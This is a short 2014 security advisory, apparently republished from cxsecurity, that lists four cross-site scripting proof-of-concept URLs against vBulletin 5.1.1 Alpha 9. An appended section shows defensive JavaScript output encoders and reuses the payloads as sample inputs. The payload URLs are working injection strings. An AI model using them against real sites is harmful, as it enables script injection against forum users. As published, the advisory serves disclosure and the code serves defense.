vBulletin 5.1 Cross Site Scripting

2014.04.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9

[XSS] Random topic - https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//

[XSS] New private message - https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372) - https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//

[DOM XSS] Help - https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

(c) Romanian Security Team 2014
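Added example, not part of the advisory and not vBulletin code: the payload shapes above suggest two reflection contexts, a JavaScript string literal (`";alert(123);//`) and a double-quoted HTML attribute (`"><input ...`), and each needs its own encoder. The template fragments, function names and the `recipient`/`view` variable names are assumptions made for illustration; the sample values are constructed from the PoC URLs.

```javascript
// Added example, not vBulletin code. Template fragments are hypothetical.

// Sample values constructed from the PoC URLs quoted in the advisory.
const SAMPLES = {
  view: 'stream1337";alert(123);//',
  recipient: '9999"><input onfocus=alert(1) autofocus>',
  folderid: 'random";alert(1);//',
};

// HTML text and quoted-attribute context: neutralise markup metacharacters.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context inside an inline <script> element.
// Every UTF-16 code unit that is not an ASCII letter or digit becomes \uXXXX,
// so quotes, backslashes, slashes, angle brackets and line terminators can
// end neither the string literal nor the enclosing script element.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hypothetical template: request value reflected into a quoted attribute.
function renderRecipientField(recipient) {
  return '<input name="recipient" value="' + encodeHtml(recipient) + '">';
}

// Hypothetical template: request value reflected into an inline script string.
function renderViewScript(view) {
  return '<script>var view = "' + encodeJsString(view) + '";</script>';
}

// Show the rendered, inert output for the advisory's sample values.
console.log(renderRecipientField(SAMPLES.recipient));
console.log(renderViewScript(SAMPLES.view));
console.log(renderViewScript(SAMPLES.folderid));
```

The two encoders are not interchangeable: `encodeHtml` is not sufficient for the script context. For the DOM case in the help page, the fragment should only ever reach a text sink such as `textContent`, never `innerHTML` or `document.write`.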



Copyright 2024, cxsecurity.com

 
